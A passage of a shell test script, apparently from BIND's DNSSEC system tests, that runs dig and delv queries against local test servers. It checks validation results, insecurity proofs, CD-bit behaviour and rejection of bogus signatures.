/dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative wildcard validation OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 txt b.optout.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +# Check the insecure.example domain + +echo_i "checking 1-server insecurity proof NSEC ($n)" +ret=0 +dig_with_opts +noauth a.insecure.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.insecure.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server insecurity proof NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.insecure.example > delv.out$n || ret=1 + grep "a.insecure.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server insecurity proof NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.insecure.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.insecure.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server insecurity proof NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.insecure.nsec3.example > delv.out$n || ret=1 + grep "a.insecure.nsec3.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server insecurity proof OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.insecure.optout.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.insecure.optout.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server insecurity proof OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.insecure.optout.example > delv.out$n || ret=1 + grep "a.insecure.optout.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof NSEC ($n)" +ret=0 +dig_with_opts q.insecure.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts q.insecure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server negative insecurity proof NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.insecure.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof NSEC3 ($n)" +ret=0 +dig_with_opts q.insecure.nsec3.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts q.insecure.nsec3.example. 
a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server negative insecurity proof NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.insecure.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof OPTOUT ($n)" +ret=0 +dig_with_opts q.insecure.optout.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts q.insecure.optout.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server negative insecurity proof OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.insecure.optout.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof with SOA hack NSEC ($n)" +ret=0 +dig_with_opts r.insecure.example. soa @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts r.insecure.example. 
soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "0 IN SOA" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking 1-server negative insecurity proof with SOA hack NSEC3 ($n)" +ret=0 +dig_with_opts r.insecure.nsec3.example. soa @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts r.insecure.nsec3.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "0 IN SOA" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking 1-server negative insecurity proof with SOA hack OPTOUT ($n)" +ret=0 +dig_with_opts r.insecure.optout.example. soa @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts r.insecure.optout.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "0 IN SOA" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check the secure.example domain + +echo_i "checking multi-stage positive validation NSEC/NSEC ($n)" +ret=0 +dig_with_opts +noauth a.secure.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.secure.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC/NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC/OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC3/NSEC ($n)" +ret=0 +dig_with_opts +noauth a.secure.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.secure.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC3/NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.nsec3.example. 
\ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC3/OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation OPTOUT/NSEC ($n)" +ret=0 +dig_with_opts +noauth a.secure.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.secure.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation OPTOUT/NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.optout.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation OPTOUT/OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking empty NODATA OPTOUT ($n)" +ret=0 +dig_with_opts +noauth empty.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth empty.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +#grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check the bogus domain + +echo_i "checking failed validation ($n)" +ret=0 +dig_with_opts a.bogus.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+if [ -x "${DELV}" ] ; then
+ ret=0
+ echo_i "checking failed validation using dns_client ($n)"
+ delv_with_opts +cd @10.53.0.4 a a.bogus.example > delv.out$n 2>&1 || ret=1
+ grep "resolution failed: RRSIG failed to verify" delv.out$n > /dev/null || ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+fi
+
+# Try validating with a bad trusted key.
+# This should fail.
+
+echo_i "checking that validation fails with a misconfigured trusted key ($n)"
+ret=0
+dig_with_opts example. soa @10.53.0.5 > dig.out.ns5.test$n || ret=1
+grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that negative validation fails with a misconfigured trusted key ($n)"
+ret=0
+dig_with_opts example. ptr @10.53.0.5 > dig.out.ns5.test$n || ret=1
+grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that insecurity proofs fail with a misconfigured trusted key ($n)"
+ret=0
+dig_with_opts a.insecure.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1
+grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that validation fails when key record is missing ($n)"
+ret=0
+dig_with_opts a.b.keyless.example. 
a @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+if [ -x "${DELV}" ] ; then
+ ret=0
+ echo_i "checking that validation fails when key record is missing using dns_client ($n)"
+ delv_with_opts +cd @10.53.0.4 a a.b.keyless.example > delv.out$n 2>&1 || ret=1
+ grep "resolution failed: insecurity proof failed" delv.out$n > /dev/null || ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+fi
+
+echo_i "checking that validation succeeds when a revoked key is encountered ($n)"
+ret=0
+dig_with_opts revkey.example soa @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags: .* ad" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+if [ -x "${DELV}" ] ; then
+ ret=0
+ echo_i "checking that validation succeeds when a revoked key is encountered using dns_client ($n)"
+ delv_with_opts +cd @10.53.0.4 soa revkey.example > delv.out$n 2>&1 || ret=1
+ grep "fully validated" delv.out$n > /dev/null || ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+fi
+
+echo_i "Checking that a bad CNAME signature is caught after a +CD query ($n)"
+ret=0
+#prime
+dig_with_opts +cd bad-cname.example. @10.53.0.4 > dig.out.ns4.prime$n || ret=1
+#check: requery with +CD. pending data should be returned even if it's bogus
+expect="a.example.
+10.0.0.1"
+ans=$(dig_with_opts +cd +nodnssec +short bad-cname.example. @10.53.0.4) || ret=1
+test "$ans" = "$expect" || ret=1
+test "$ret" -eq 0 || echo_i "failed, got '$ans', expected '$expect'"
+#check: requery without +CD. bogus cached data should be rejected.
+dig_with_opts +nodnssec bad-cname.example. 
@10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "Checking that a bad DNAME signature is caught after a +CD query ($n)"
+ret=0
+#prime
+dig_with_opts +cd a.bad-dname.example. @10.53.0.4 > dig.out.ns4.prime$n || ret=1
+#check: requery with +CD. pending data should be returned even if it's bogus
+expect="example.
+a.example.
+10.0.0.1"
+ans=$(dig_with_opts +cd +nodnssec +short a.bad-dname.example. @10.53.0.4) || ret=1
+test "$ans" = "$expect" || ret=1
+test "$ret" -eq 0 || echo_i "failed, got '$ans', expected '$expect'"
+#check: requery without +CD. bogus cached data should be rejected.
+dig_with_opts +nodnssec a.bad-dname.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Check the insecure.secure.example domain (insecurity proof)
+
+echo_i "checking 2-server insecurity proof ($n)"
+ret=0
+dig_with_opts +noauth a.insecure.secure.example. @10.53.0.2 a \
+ > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth a.insecure.secure.example. @10.53.0.4 a \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Check a negative response in insecure.secure.example
+
+echo_i "checking 2-server insecurity proof with a negative answer ($n)"
+ret=0
+dig_with_opts q.insecure.secure.example. @10.53.0.2 a > dig.out.ns2.test$n \
+ || ret=1
+dig_with_opts q.insecure.secure.example. 
@10.53.0.4 a > dig.out.ns4.test$n \
+ || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking 2-server insecurity proof with a negative answer and SOA hack ($n)"
+ret=0
+dig_with_opts r.insecure.secure.example. @10.53.0.2 soa > dig.out.ns2.test$n \
+ || ret=1
+dig_with_opts r.insecure.secure.example. @10.53.0.4 soa > dig.out.ns4.test$n \
+ || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Check that the query for a security root is successful and has ad set
+
+echo_i "checking security root query ($n)"
+ret=0
+dig_with_opts . @10.53.0.4 key > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Check that the setting the cd bit works
+
+echo_i "checking cd bit on a positive answer ($n)"
+ret=0
+dig_with_opts +noauth example. soa @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+dig_with_opts +noauth +cdflag example. 
soa @10.53.0.5 \
+ > dig.out.ns5.test$n || ret=1
+digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking cd bit on a negative answer ($n)"
+ret=0
+dig_with_opts q.example. soa @10.53.0.4 > dig.out.ns4.test$n || ret=1
+dig_with_opts +cdflag q.example. soa @10.53.0.5 > dig.out.ns5.test$n || ret=1
+digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking insecurity proof works using negative cache ($n)"
+ret=0
+rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i
+dig_with_opts +cd @10.53.0.4 insecure.example. ds > dig.out.ns4.test$n.1 || ret=1
+for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
+do
+ dig_with_opts @10.53.0.4 nonexistent.insecure.example. > dig.out.ns4.test$n.2 || ret=1
+ if grep "status: NXDOMAIN" dig.out.ns4.test$n.2 >/dev/null; then
+ break
+ fi
+ sleep 1
+done
+grep "status: NXDOMAIN" dig.out.ns4.test$n.2 >/dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive validation RSASHA256 NSEC ($n)"
+ret=0
+dig_with_opts +noauth a.rsasha256.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth a.rsasha256.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive validation RSASHA512 NSEC ($n)"
+ret=0
+dig_with_opts +noauth a.rsasha512.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth a.rsasha512.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive validation with KSK-only DNSKEY signature ($n)"
+ret=0
+dig_with_opts +noauth a.kskonly.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth a.kskonly.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking cd bit on a query that should fail ($n)"
+ret=0
+dig_with_opts a.bogus.example. soa @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+dig_with_opts +cdflag a.bogus.example. soa @10.53.0.5 \
+ > dig.out.ns5.test$n || ret=1
+digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking cd bit on an insecurity proof ($n)"
+ret=0
+dig_with_opts +noauth a.insecure.example. soa @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+dig_with_opts +noauth +cdflag a.insecure.example. 
soa @10.53.0.5 \
+ > dig.out.ns5.test$n || ret=1
+digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - these are looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking cd bit on a negative insecurity proof ($n)"
+ret=0
+dig_with_opts q.insecure.example. a @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+dig_with_opts +cdflag q.insecure.example. a @10.53.0.5 \
+ > dig.out.ns5.test$n || ret=1
+digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - these are looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that validation of an ANY query works ($n)"
+ret=0
+dig_with_opts +noauth foo.example. any @10.53.0.2 > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth foo.example. any @10.53.0.4 > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# 2 records in the zone, 1 NXT, 3 SIGs
+grep "ANSWER: 6" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that validation of a query returning a CNAME works ($n)"
+ret=0
+dig_with_opts +noauth cname1.example. txt @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth cname1.example. 
txt @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# the CNAME & its sig, the TXT and its SIG
+grep "ANSWER: 4" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that validation of a query returning a DNAME works ($n)"
+ret=0
+dig_with_opts +noauth foo.dname1.example. txt @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth foo.dname1.example. txt @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# The DNAME & its sig, the TXT and its SIG, and the synthesized CNAME.
+# It would be nice to test that the CNAME is being synthesized by the
+# recursive server and not cached, but I don't know how.
+grep "ANSWER: 5" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that validation of an ANY query returning a CNAME works ($n)"
+ret=0
+dig_with_opts +noauth cname2.example. any @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth cname2.example. any @10.53.0.4 \
